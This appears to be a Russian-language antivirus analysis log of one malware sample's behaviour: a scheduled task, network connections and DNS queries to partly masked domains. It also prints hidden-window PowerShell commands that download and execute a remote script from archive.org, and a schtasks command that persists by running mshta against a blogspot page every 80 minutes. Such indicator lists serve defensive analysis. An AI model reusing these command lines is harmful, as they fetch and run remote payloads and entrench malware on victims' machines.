Техническая информация
- <SYSTEM32>\tasks\secotaksa
- '<SYSTEM32>\mshta.exe' http://www.bi##y.com/bdgahsdbhmasgdkasbdagdkasgdj
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1104
- %TEMP%\1157870.cvr
- 'bi##y.com':80
- 'me########hiteknaihai.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
- 'me########hiteknaihai.blogspot.com':443
- 'bl##ger.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
- DNS ASK bi##y.com
- DNS ASK me########hiteknaihai.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK go#####analytics.com
- DNS ASK fo###.gstatic.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://ia801504.us.archive.org/22/items/sb_20210718/ahsan.txt') -useB);' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/ahsannewone.html\""' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://ia801504.us.archive.org/22/items/sb_20210718/ahsan.txt') -useB);
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/ahsannewone.html\""